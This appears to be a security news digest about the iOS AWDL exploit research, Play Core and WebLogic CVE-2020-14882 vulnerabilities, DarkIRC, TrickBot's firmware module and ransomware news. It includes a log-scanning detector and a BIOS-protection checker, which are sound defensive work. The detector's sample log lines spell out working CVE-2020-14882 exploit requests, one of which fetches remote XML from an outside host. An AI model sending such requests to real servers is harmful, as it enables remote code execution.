The last couple of weeks have not brought much cool news, but we have selected the most interesting and useful items. The contents below give a short description of each section.
- Vulnerabilities: iOS research, Android apps (check yours) and WebLogic (again);
- Tools: useful tools. Depix and Karkinos should be tested;
- News: only malware. Mac, TrickBot and a cheerful ransomware gang;
- Research: books, articles, reports
Really short feedback -> here
Ian Beer from Google Project Zero has published the results of his research into exploiting a vulnerability in Apple iOS: a kernel memory corruption bug that gives full remote access to all of the user's data.
Ian Beer's attention was drawn to a memmove call: after checking how its parameters were derived, he found the most ordinary buffer overflow in the code. Using this bug, an attacker can inject packets into an AWDL connection (without necessarily being on the same Wi-Fi network), gain access to the device and run an implant with root privileges. The whole chain completed in a few minutes and was carried out against an iPhone 11 Pro in the next room. In his opinion, with sufficient will and funding, the same trick could be done in seconds and from a much greater distance from the target.
Impressive research job!!!
Please click update on your iPhone.
About 8% of apps in the Google Play Store are vulnerable to a bug in the Play Core library. Check Point warned that the developers of many popular Android applications forgot to update this important library and are now exposed to attack.
Earlier this year, researchers from Oversecured discovered the critical vulnerability CVE-2020-8913 in Play Core. It could be exploited by a malicious application installed on the user's device to inject malicious code into other applications and steal confidential data, including passwords, photos, 2FA codes and much more.
The list of apps that have already updated the library includes Facebook, Instagram, Snapchat, WhatsApp and Chrome. Unfortunately, the developers of many other large applications have not done so. Among them the researchers list Microsoft Edge, Grindr, OKCupid, Cisco Teams, Viber and Booking. In total, the affected applications have been installed over 250,000,000 times.
Many Oracle WebLogic servers remain vulnerable to the RCE CVE-2020-14882, which was patched two months ago. Juniper Threat Labs writes that the most interesting malware being deployed through it is DarkIRC, currently sold on hacking forums for $75.
DarkIRC reaches unpatched servers through an HTTP GET request that triggers a PowerShell script, which in turn downloads and runs a malicious binary with both anti-analysis and sandbox-evasion features. For example, before unpacking, the malware checks whether it is running on a VMware, VirtualBox, VBox, QEMU or Xen virtual machine and stops the infection process if it detects a sandboxed environment.
DarkIRC has many features, including keylogging, stealing files and executing commands on the infected server, stealing credentials, and spreading to other devices via MSSQL and RDP (by brute force), SMB or USB.
Update if you have not already done so.
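Because the initial access described above is a single HTTP GET to an unpatched console, the quickest retroactive check is your web-server access log. The following is an added example written for this digest (not code from Juniper's report or from Oracle): it parses combined-format access-log lines, undoes the double percent-encoding the public CVE-2020-14882 exploit uses to smuggle `..` past the console's path check (this request shape comes from public reporting, not from the text above) and flags requests that traverse out of the unauthenticated `/console/css/` path into `console.portal`. The log lines are constructed for the example, and `find_exploit_attempts` and the other names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format (not real captures).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2020:10:01:12 +0000] "GET /console/css/console.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Dec/2020:10:02:44 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Dec/2020:10:03:01 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22...%22) HTTP/1.1" 200 1024 "-" "python-requests/2.25"
203.0.113.8 - - [05/Dec/2020:10:03:05 +0000] "GET /console/css/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://203.0.113.8/x.xml%22) HTTP/1.1" 200 1024 "-" "curl/7.68"
10.0.0.12 - - [05/Dec/2020:10:04:10 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(target: str) -> str:
    """Return the request path percent-decoded twice and lower-cased.

    The exploit encodes '..' as %252e%252e: the first decoder turns that into
    %2e%2e, which the console then resolves as '..'. Decoding twice here puts
    the logged path into the form the vulnerable component actually handled.
    """
    path = target.split("?", 1)[0]
    return unquote(unquote(path)).lower()


def classify_request(target: str) -> dict:
    """Score one request target for the CVE-2020-14882 access pattern.

    traversal: the path enters /console/css/ (static, unauthenticated) and
               climbs out with '..' to reach console.portal
    handle:    a 'handle=' query parameter is present, the channel through
               which the attacker hands the console a class to instantiate
    """
    path = normalize_path(target)
    query = target.split("?", 1)[1] if "?" in target else ""
    traversal = (
        path.startswith("/console/css/")
        and "/../" in path
        and path.endswith("console.portal")
    )
    handle = "handle=" in unquote(query).lower()
    return {"traversal": traversal, "handle": handle, "path": path}


def find_exploit_attempts(log_text: str) -> list:
    """Parse each log line and return those matching the traversal indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        verdict = classify_request(m["target"])
        if verdict["traversal"]:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": m["status"],
                "handle_param": verdict["handle"],
                "path": verdict["path"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 on such a request is the worrying case: a patched server should refuse the traversal, so any hit with a 2xx status deserves a look at what the server did next (child PowerShell processes, outbound connections), not just a block rule.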
It is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). Its goal is to help security researchers and network administrators with network traffic analysis as they try to identify weaknesses.
It is a tool for recovering passwords from pixelized screenshots. Strictly speaking a red-team tool, but it is important that the blue side of this world is aware of it as well.
PYTMIPE is a Python 3 library for manipulating Windows tokens and managing impersonation in order to gain more privileges on Windows. TMIPE is the Python 3 client that uses the pytmipe library.
Karkinos is a lightweight "Swiss Army knife" for penetration testing and/or hacking CTFs (in the spirit of CyberChef). Try it out!
New malware for Mac with a backdoor for later remote access. It looks like a Word document, although the application actually sits inside an archive, and so far few antivirus engines detect it. An interesting exploration of its functionality.
The initial compromise is through a Zip archive disguised as a Word document called "ALL tim nha Chi Ngoc Canada". To bypass detection by antivirus solutions, several special characters have been added to the archive name. Once the first stage runs, it retrieves a second-stage payload, which in turn fetches the backdoor itself. The backdoor has RAT functionality: it collects information about the system, communicates with its C&C, works with the file system and loads additional functional modules.
Over the past few weeks, TrickBot has introduced new obfuscation features and new C2 infrastructure, and has launched new spam campaigns to recruit zombie computers. The botnet also has a new module for interacting with the UEFI/BIOS firmware. Such an upgrade would significantly complicate not only cleaning up an infection but also detecting it.
So far, the new TrickBot module only checks the SPI controller to determine whether BIOS write protection is enabled, and does not yet make any changes to the firmware.
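To make concrete what "checks whether BIOS protection is enabled" involves, here is an added example (written for this digest; it is not TrickBot's code and not from the original post) that decodes the two register sets such a check reads on Intel platforms: the BIOS_CNTL lock bits and the SPI protected-range registers. The bit layouts are taken from Intel PCH documentation rather than from the text above, the register values are constructed for three hypothetical machines, and the function names are the example's own.

```python
# Bit layout of the BIOS_CNTL register (PCI config offset 0xDC on the Intel
# PCH/LPC bridge). Definitions assumed from Intel PCH documentation, not taken
# from the page; the example assumes a platform of that family.
BIOSWE = 1 << 0   # BIOS Write Enable: 1 = software may write the BIOS region
BLE = 1 << 1      # BIOS Lock Enable: 1 = setting BIOSWE raises an SMI
SMM_BWP = 1 << 5  # SMM BIOS Write Protect: 1 = writes honoured only from SMM


def decode_bios_cntl(value: int) -> dict:
    """Split a raw BIOS_CNTL byte into the three bits that matter here."""
    return {
        "bioswe": bool(value & BIOSWE),
        "ble": bool(value & BLE),
        "smm_bwp": bool(value & SMM_BWP),
    }


def decode_pr(value: int) -> dict:
    """Decode one SPI Protected Range register (PR0..PR4).

    Assumed layout (Intel PCH SPI controller): bit 31 write-protect enable,
    bits 28:16 range limit and bits 12:0 range base, both in 4 KiB pages.
    """
    return {
        "wpe": bool((value >> 31) & 1),
        "base": (value & 0x1FFF) << 12,
        "limit": (((value >> 16) & 0x1FFF) << 12) | 0xFFF,
    }


def assess_bios_write_protection(bios_cntl: int, pr_regs: list,
                                 bios_base: int, bios_limit: int) -> dict:
    """Decide whether the BIOS region of SPI flash is writable from the OS.

    Two independent mechanisms can protect it: the BIOS_CNTL lock bits, or a
    protected range that covers the whole region. The state 'weak' means BLE
    is set without SMM_BWP; a known race between setting BIOSWE and the SMI
    handler clearing it again defeats that, so it is counted as writable.
    """
    cntl = decode_bios_cntl(bios_cntl)
    if cntl["bioswe"]:
        state = "writable"      # write enable is already set
    elif cntl["ble"] and cntl["smm_bwp"]:
        state = "protected"     # only SMM code can write the region
    elif cntl["ble"]:
        state = "weak"          # lock present but raceable
    else:
        state = "writable"      # nothing stops setting BIOSWE from the OS
    covered = any(
        pr["wpe"] and pr["base"] <= bios_base and pr["limit"] >= bios_limit
        for pr in map(decode_pr, pr_regs)
    )
    protected = state == "protected" or covered
    return {
        "bios_cntl": cntl,
        "bios_cntl_state": state,
        "pr_covers_bios": covered,
        "firmware_writable": not protected,
    }


# Constructed register values for hypothetical machines (not real dumps).
# The BIOS region is assumed to sit at 0x00800000..0x00FFFFFF of the flash.
BIOS_BASE, BIOS_LIMIT = 0x00800000, 0x00FFFFFF
SAMPLES = {
    "locked_laptop": {"bios_cntl": 0x22, "prs": [0, 0, 0, 0, 0]},           # BLE + SMM_BWP
    "ble_only":      {"bios_cntl": 0x02, "prs": [0, 0, 0, 0, 0]},           # raceable
    "pr_protected":  {"bios_cntl": 0x00, "prs": [0x8FFF0800, 0, 0, 0, 0]},  # PR0 covers region
    "wide_open":     {"bios_cntl": 0x01, "prs": [0, 0, 0, 0, 0]},           # BIOSWE set
}


def assess_samples() -> dict:
    """Run the assessment over every constructed sample."""
    return {
        name: assess_bios_write_protection(s["bios_cntl"], s["prs"], BIOS_BASE, BIOS_LIMIT)
        for name, s in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, verdict in assess_samples().items():
        print(f"{name:14s} state={verdict['bios_cntl_state']:9s} "
              f"pr_covers={verdict['pr_covers_bios']} "
              f"writable={verdict['firmware_writable']}")
```

On a real machine the raw values come from PCI configuration space and the SPI controller's memory-mapped registers; CHIPSEC's `common.bios_wp` module performs the same reading and reports the same kind of verdict, which is a reasonable way for a defender to learn what a module like TrickBot's would see on their fleet.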
Egregor likes to print its ransom note on the victim organization's printers (why not?). Recently the large Latin American retail chain Cencosud learned about its attack this way, and the other day so did TransLink, the Vancouver public transport operator.
That something was amiss at TransLink became known on December 1, when residents of the city of 700,000 could not use their Compass cards to pay for travel on buses, ferries and trains.
The rest of the details of the attack, as usual, are unknown.
Tactics, Techniques and Procedures (TTPs) used by the Nefilim ransomware threat actor – a detailed walkthrough. All TTPs are mapped to MITRE ATT&CK Framework: https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks
Security and hacking related books. One of the best collections of books on information security; they are so good that they can be found in almost every collection. https://docs.google.com/document/d/1-l1dagQ643nH8chDl2VwRwdJxZZ6D3M1K07pvLfAbSI
Not bad info about DCSync: https://www.blacklanternsecurity.com/2020-12-04-DCSync
Data Exfiltration with LOLBins: https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-20e5e9c1ed8e
Visualizing IP Traffic with Brim, Zeek and NetworkX: https://medium.com/brim-securitys-knowledge-funnel/visualizing-ip-traffic-with-brim-zeek-and-networkx-3844a4c25a2f